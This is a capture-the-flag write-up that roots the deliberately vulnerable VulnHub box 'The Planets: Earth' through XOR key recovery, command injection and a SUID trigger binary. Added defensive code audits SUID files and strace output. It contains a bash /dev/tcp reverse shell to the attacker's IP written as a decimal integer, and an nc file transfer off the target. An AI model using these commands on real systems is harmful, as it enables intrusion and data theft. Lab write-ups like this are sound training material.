
vulnhub刷题记录(The Planets: Earth)

author:AILX10
  • English name: The Planets: Earth
  • Chinese name: planet: earth
  • Published date: November 2, 2021
  • Difficulty: Easy
  • Description: Earth is an easy box, although you may find it more challenging than "Mercury" in this series, and depending on your experience, on the harder side of the easy. There are two flags on the box: a user flag and a root flag containing the md5 hash. This has been tested on VirtualBox, so it may not work properly on VMware. Please email SirFlash on http://protonmail.com with any questions/problems or feedback, although it may take a while for me to get back to you.
  • Download: https://www.vulnhub.com/entry/the-planets-earth,755/

1. Find the target's IP address: a ping sweep of the subnet turns up one suspicious host

  • earth.lan (192.168.199.179)
└─$ nmap -sP 192.168.199.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-20 13:21 CST
Nmap scan report for Hiwifi.lan (192.168.199.1)
Host is up (0.0027s latency).
Nmap scan report for 192.168.199.114
Host is up (0.0037s latency).
Nmap scan report for N3NXCV065297107.lan (192.168.199.151)
Host is up (0.0092s latency).
Nmap scan report for earth.lan (192.168.199.179)
Host is up (0.0020s latency).
Nmap scan report for kali.lan (192.168.199.247)
Host is up (0.00051s latency).
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.70 seconds            

2. Port-scan that address: ports 22, 80 and 443 are open

$ nmap -A 192.168.199.179        
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-20 13:28 CST
Nmap scan report for earth.lan (192.168.199.179)
Host is up (0.61s latency).
Not shown: 933 filtered tcp ports (no-response), 64 filtered tcp ports (host-unreach)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_  256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after:  2031-10-10T23:26:31
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time           

3. Before brute-forcing directories on the website, add the hostnames from the TLS certificate to the hosts file

192.168.199.179 terratest.earth.local
192.168.199.179 earth.local           

4. The directory brute-force results: port 80 has an admin backend, port 443 has the homepage and a robots.txt

---- Scanning URL: http://terratest.earth.local/ ----
+ http://terratest.earth.local/admin (CODE:301|SIZE:0)     

+ https://terratest.earth.local/index.html (CODE:200|SIZE:26)                  
+ https://terratest.earth.local/robots.txt (CODE:200|SIZE:521)              

5. Visit the site; robots.txt lists a testingnotes.* path

[Screenshot: home page]

[Screenshot: admin backend]

[Screenshot: robots.txt]

6. Follow the prompts to enter the testingnotes.txt page and get 2 clues

  • Key clue: testdata.txt
  • Username clue: Terra
[Screenshot: clues page]

Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.


7. Follow the clues and open testdata.txt, the known plaintext used to test the encryption

[Screenshot: testdata.txt]

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

8. The home page shows 3 ciphertexts; using the clues above, recover the corresponding plaintext

[Screenshot: the 3 ciphertexts on the home page]

Previous Messages: (three hex strings; the second is shown here, all three appear as data1, data2 and data3 in the decoding script below)
    3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45

9. XOR the 3 messages with testdata.txt; the third one lines up with the known plaintext and yields the repeating key: EarthClimateChangeBad4Humans

b'According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth\'s hisCfy //}omo;/ppeare\'2~d;\x7ff$\'x,\x7fjj=*alf3,oq|y$w6&|%Qjvw+U <@f;y/j\x7fkr0~h<Pj1s.=\x06i\x97\xf3\xdcs-q,<j${ugn$u6&\x7f*+o\'erlj|mnn/?;-\'\x7f1%,f{kx8.`\x7fb)"\x8c\xe5\x99np`ust*yzd1}xbi:o{)~sh},^6#Tjcy7aj,yn>Hhu-\x17skl)$In*\'y/dybj7pt4~u"t=5jgh&#yx*+fwi=/eapyrncanxky\x7f8/k<\x0b6=+1\x80\xe8\xdaq*Ir8xo"P|7wfbn'
b"According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the prol^rrlj~<evy\x7f{&*xk|h$kaw-oc 0-'web146iqc$hte7af#`ec~)o>kFnkukzdt|a>y~ciyvb~jn$6O?0i~\x7fd|0v|$lx4~%5l3d*`mx6a8{vcketdia %e,{tr9x>q{1w$h&v~oaxx-)if4tv6pudk"
b'earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat'           

Decoding Code Reference:

# Ciphertexts copied from the homepage's "Previous Messages", hex-encoded
data1 = "37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40"
data2 = "3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45"
data3 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"

# testdata.txt is the known plaintext; ciphertext XOR plaintext = key stream
known = open('testdata.txt', 'rb').read()

def xor_with_known(ct_hex, known):
    ct = bytes.fromhex(ct_hex)
    # Byte-wise XOR aligned from the first byte; the shorter operand sets the length.
    # (XOR-ing the two values as big integers instead aligns them from the last byte
    # and drops leading zero bytes, which is why only equal-length inputs decode cleanly that way.)
    return bytes(a ^ b for a, b in zip(ct, known))

t1 = xor_with_known(data1, known)  # data1/data2 were not made from testdata.txt, so these stay unreadable
t2 = xor_with_known(data2, known)
t3 = xor_with_known(data3, known)  # data3 is testdata.txt encrypted, so this prints the repeating key
print(t1)
print(t2)
print(t3)
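The testing notes claim XOR "should be safe as used in RSA"; the decode above shows why it is not. The following is an added example (not code from the original post or the box author) that carries the known-plaintext attack through end to end on constructed data: a repeating-key XOR, one ciphertext whose plaintext the analyst also holds, recovery of the key stream, reduction to the shortest repeating period, and reuse of that key against a second message. The key, the two texts and the function names are assumptions made up for this demonstration.

```python
def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings aligned from the first byte; the shorter one sets the length."""
    return bytes(x ^ y for x, y in zip(a, b))


def xor_repeating_key(data: bytes, key: bytes) -> bytes:
    """Encrypt or decrypt with a key that repeats every len(key) bytes (the scheme in the notes)."""
    return bytes(d ^ key[i % len(key)] for i, d in enumerate(data))


def recover_key_stream(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext attack: C XOR P gives back exactly the key stream used for C."""
    return xor_bytes(ciphertext, known_plaintext)


def shortest_period(stream: bytes) -> bytes:
    """Shortest prefix that regenerates the whole stream by repetition, i.e. the key itself."""
    for n in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    return stream


# Constructed sample values (assumptions for this example, not data from the box):
# a 28-byte key, a public text that one message was built from, and a second, secret message.
KEY = b"earthclimatechangebad4humans"
PUBLIC_TEXT = (b"According to radiometric dating estimation and other evidence, "
               b"Earth formed over 4.5 billion years ago.")
SECRET_TEXT = b"Terra, the admin portal password is this month's key."


def demo():
    """Encrypt both texts with KEY, then recover KEY from the public one and read the secret one."""
    c_public = xor_repeating_key(PUBLIC_TEXT, KEY)
    c_secret = xor_repeating_key(SECRET_TEXT, KEY)
    stream = recover_key_stream(c_public, PUBLIC_TEXT)   # key repeated ~3.6 times
    key = shortest_period(stream)                        # collapse to one period
    recovered = xor_repeating_key(c_secret, key)         # the key now opens every other message
    return key, recovered


if __name__ == "__main__":
    key, msg = demo()
    print(key)   # b'earthclimatechangebad4humans'
    print(msg)
```

The defensive lesson is the one the notes were groping towards in their "Todo": a key that is reused across messages (monthly, weekly, or at all) turns one leaked plaintext into every plaintext, and no key length fixes that; only a key stream never reused, or a real authenticated cipher, does.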

10. With the username and the recovered password, I logged in to the test page and found that it executes commands

[Screenshot: the admin backend test page]

11. Get a reverse shell with nc

Attacker machine:
nc -lvnp 4444
Target machine:
bash -i >& /dev/tcp/3232286711/4444 0>&1

Here 3232286711 is the attacker's IP address 192.168.199.247 written as a single decimal integer; the conversion code:

import socket
import struct

ip = "192.168.199.247"
# inet_aton gives the 4 address bytes in network (big-endian) order;
# unpack them as one big-endian unsigned int to get the decimal form.
int_ip = struct.unpack("!I", socket.inet_aton(ip))[0]
print(int_ip)  # 3232286711

Successfully got the shell

[Screenshot: the reverse shell connects]

12. Try to find the flag

find / -name "*flag*" 2>/dev/null           
[Screenshot: locating the flag file]

The flag file's location:

/var/earth_web/user_flag.txt           

Read the flag:

cat /var/earth_web/user_flag.txt
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]           

13. Next, look for the root flag: list files with the SUID bit set

bash-5.1$ find / -perm -u=s 2>/dev/null
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/reset_root
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1           
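Everything in that list except /usr/bin/reset_root is a binary the distribution ships set-uid on purpose, which is exactly the comparison a defender wants automated. The following is an added example (not code from the original post) that parses the find listing above, diffs it against an allow list, and can also walk a live filesystem the way find -perm -u=s does. The allow list is an assumption built from the listing itself, not a vendor-published baseline; on a real host it should come from the package manager's file ownership data.

```python
import os
import stat

# Constructed sample: the `find / -perm -u=s` listing from the target above.
FIND_OUTPUT = """\
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/reset_root
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1
"""

# Assumed allow list of SUID paths a stock install is expected to carry
# (illustrative; derive it from a known-good host or package metadata in practice).
EXPECTED_SUID = {
    "/usr/bin/chage", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/su",
    "/usr/bin/mount", "/usr/bin/umount", "/usr/bin/pkexec", "/usr/bin/passwd",
    "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/at", "/usr/bin/sudo",
    "/usr/sbin/grub2-set-bootflag", "/usr/sbin/pam_timestamp_check",
    "/usr/sbin/unix_chkpwd", "/usr/sbin/mount.nfs",
    "/usr/lib/polkit-1/polkit-agent-helper-1",
}


def parse_find_output(text: str) -> list:
    """One path per non-empty line, as find prints them."""
    return [line.strip() for line in text.splitlines() if line.strip()]


def scan_suid(root: str = "/") -> list:
    """Walk a live filesystem and return regular files with the set-uid bit (find -perm -u=s)."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return found


def unexpected_suid(found, expected) -> list:
    """Set-uid paths that are not on the allow list, sorted for stable output."""
    return sorted(set(found) - set(expected))


if __name__ == "__main__":
    print(unexpected_suid(parse_find_output(FIND_OUTPUT), EXPECTED_SUID))
    # On a live host: print(unexpected_suid(scan_suid(), EXPECTED_SUID))
```

Run periodically (or from file-integrity monitoring) this turns a custom set-uid binary such as reset_root into an alert rather than a surprise found during an incident.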

Run /usr/bin/reset_root:

bash-5.1$ /usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.

14. Copy reset_root back to the attacker machine to trace it locally, using nc to transfer the file

Attacker machine:
└─# nc -lvp 5555 >reset_root
listening on [any] 5555 ...
connect to [192.168.199.247] from terratest.earth.local [192.168.199.179] 53332

Target machine:
bash-5.1$ nc 192.168.199.247 5555 < /usr/bin/reset_root

15. Debugging locally, I found that 3 folders are missing

  • /dev/shm/kHgTFI5G
  • /dev/shm/Zw7bV9U5
  • /tmp/kcM0Wewe
┌──(root㉿kali)-[/home/ailx10]
└─# ./reset_root          
zsh: 权限不够: ./reset_root
                                                                                
┌──(root㉿kali)-[/home/ailx10]
└─# ls -hl reset_root 
-rw-r--r-- 1 root root 24K  8月 20 15:20 reset_root
                                                                                
┌──(root㉿kali)-[/home/ailx10]
└─# chmod +x reset_root   
                                                                                
┌──(root㉿kali)-[/home/ailx10]
└─# ./reset_root       
CHECKING IF RESET TRIGGERS PRESENT...
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
                                                                                
┌──(root㉿kali)-[/home/ailx10]
└─# strace reset_root
strace: Can't stat 'reset_root': 没有那个文件或目录
                                                                                
┌──(root㉿kali)-[/home/ailx10]
└─# strace ./reset_root
execve("./reset_root", ["./reset_root"], 0x7ffecb5955a0 /* 32 vars */) = 0
brk(NULL)                               = 0x7bd000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (没有那个文件或目录)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=87631, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 87631, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7fe7b3a83000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0@y\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
pread64(3, "\4\0\0\0\20\0\0\0\5\0\0\0GNU\0\2\200\0\300\4\0\0\0\1\0\0\0\0\0\0\0", 32, 848) = 32
pread64(3, "\4\0\0\0\24\0\0\0\3\0\0\0GNU\0?\323\315\324#\241\204X\331\333:^P\242\263\300"..., 68, 880) = 68
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=1904752, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe7b3a81000
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 1938296, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7fe7b38a7000
mprotect(0x7fe7b38cd000, 1724416, PROT_NONE) = 0
mmap(0x7fe7b38cd000, 1409024, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x26000) = 0x7fe7b38cd000
mmap(0x7fe7b3a25000, 311296, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x17e000) = 0x7fe7b3a25000
mmap(0x7fe7b3a72000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1ca000) = 0x7fe7b3a72000
mmap(0x7fe7b3a78000, 33656, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7fe7b3a78000
close(3)                                = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fe7b38a5000
arch_prctl(ARCH_SET_FS, 0x7fe7b3a82580) = 0
mprotect(0x7fe7b3a72000, 12288, PROT_READ) = 0
mprotect(0x403000, 4096, PROT_READ)     = 0
mprotect(0x7fe7b3ac8000, 8192, PROT_READ) = 0
munmap(0x7fe7b3a83000, 87631)           = 0
newfstatat(1, "", {st_mode=S_IFCHR|0620, st_rdev=makedev(0x88, 0x2), ...}, AT_EMPTY_PATH) = 0
brk(NULL)                               = 0x7bd000
brk(0x7de000)                           = 0x7de000
write(1, "CHECKING IF RESET TRIGGERS PRESE"..., 38CHECKING IF RESET TRIGGERS PRESENT...
) = 38
access("/dev/shm/kHgTFI5G", F_OK)       = -1 ENOENT (没有那个文件或目录)
access("/dev/shm/Zw7bV9U5", F_OK)       = -1 ENOENT (没有那个文件或目录)
access("/tmp/kcM0Wewe", F_OK)           = -1 ENOENT (没有那个文件或目录)
write(1, "RESET FAILED, ALL TRIGGERS ARE N"..., 44RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
) = 44
exit_group(0)                           = ?
+++ exited with 0 +++           
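The three access() calls in that trace are the whole story: a set-uid root binary decides whether to reset the root password based on the existence of files under /dev/shm and /tmp, directories any local user can write to. The following is an added example (not code from the original post) that parses strace output for access() probes and flags the ones that land in world-writable directories, which is the check to run over a trace of any privileged binary under review. The sample trace is constructed from the lines above (with the error text in the English locale), and the regex, prefix list and function names are assumptions for this example.

```python
import re

# Matches strace lines such as:
#   access("/tmp/kcM0Wewe", F_OK)           = -1 ENOENT (No such file or directory)
ACCESS_RE = re.compile(
    r'^access\("(?P<path>[^"]+)",\s*(?P<mode>[A-Z_|]+)\)'
    r'\s*=\s*(?P<ret>-?\d+)(?:\s+(?P<err>[A-Z]+))?'
)

# Directories every local user can write to; a privileged program gating its
# behaviour on files here hands the gate to unprivileged users.
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Constructed sample: the relevant lines from the strace above plus two benign ones.
SAMPLE_TRACE = """\
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
write(1, "CHECKING IF RESET TRIGGERS PRESE"..., 38) = 38
access("/dev/shm/kHgTFI5G", F_OK)       = -1 ENOENT (No such file or directory)
access("/dev/shm/Zw7bV9U5", F_OK)       = -1 ENOENT (No such file or directory)
access("/tmp/kcM0Wewe", F_OK)           = -1 ENOENT (No such file or directory)
exit_group(0)                           = ?
"""


def parse_access_calls(trace: str) -> list:
    """(path, mode, return value, errno name or None) for every access() line in the trace."""
    calls = []
    for line in trace.splitlines():
        m = ACCESS_RE.match(line)
        if m:
            calls.append((m["path"], m["mode"], int(m["ret"]), m["err"]))
    return calls


def writable_triggers(trace: str) -> list:
    """access() probes whose target sits under a world-writable directory, with their errno."""
    return [(path, err) for path, _mode, _ret, err in parse_access_calls(trace)
            if path.startswith(WORLD_WRITABLE)]


if __name__ == "__main__":
    for path, err in writable_triggers(SAMPLE_TRACE):
        print(f"privileged decision depends on {path} ({err or 'exists'})")
```

A probe that fails with ENOENT on such a path is the worst case: the binary is waiting for a file that anyone can create. The fix on the program side is to keep trigger state under a root-owned directory with restrictive permissions (or drop the file-based trigger entirely); on the host side, file-integrity monitoring on /dev/shm and /tmp and the audit of set-uid binaries from the previous step catch the same thing.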

So create the three missing folders on the target:

bash-5.1$ mkdir dev/shm/kHgTFI5G
bash-5.1$ mkdir /dev/shm/Zw7bV9U5
bash-5.1$ mkdir /tmp/kcM0Wewe

16. Run reset_root again; this time it resets the root password

/usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth

Root password obtained: Earth

17. Switch to root and search for flag again

su root
[Screenshot: switched to root]

cat /root/root_flag.txt

              _-o#&&*''''?d:>b\_
          _o/"`''  '',, dMF9MMMMMHo_
       .o&#'        `"MbHMMMMMMMMMMMHo.
     .o"" '         vodM*&HMMMMMMMMMM?.
    ,'              $M&ood,~'`(&##MMMMMMH\
   /               ,MMMMMMM#b?#bobMMMMHMMML
  &              ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
 ?$.            :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
|               |MMMMMMMMMMMMMMMMMMMMbMH'   T,
$H#:            `*MMMMMMMMMMMMMMMMMMMMb#}'  `?
]MMH#             ""*""""*#MMMMMMMMMMMMM'    -
MMMMMb_                   |MMMMMMMMMMMP'     :
HMMMMMMMHo                 `MMMMMMMMMT       .
?MMMMMMMMP                  9MMMMMMMM}       -
-?MMMMMMM                  |MMMMMMMMM?,d-    '
 :|MMMMMM-                 `MMMMMMMT .M|.   :
  .9MMM[                    &MMMMM*' `'    .
   :9MMk                    `MMM#"        -
     &M}                     `          .-
      `&.                             .
        `~,   .                     ./
            . _                  .-
              '`--._,dd###pp=""'

Congratulations on completing Earth!
If you have any feedback please contact me at [email protected]
[root_flag_b0da9554d29db2117b02aa8b66ec492e]

That completes the box.

Published on 2022-08-20 15:39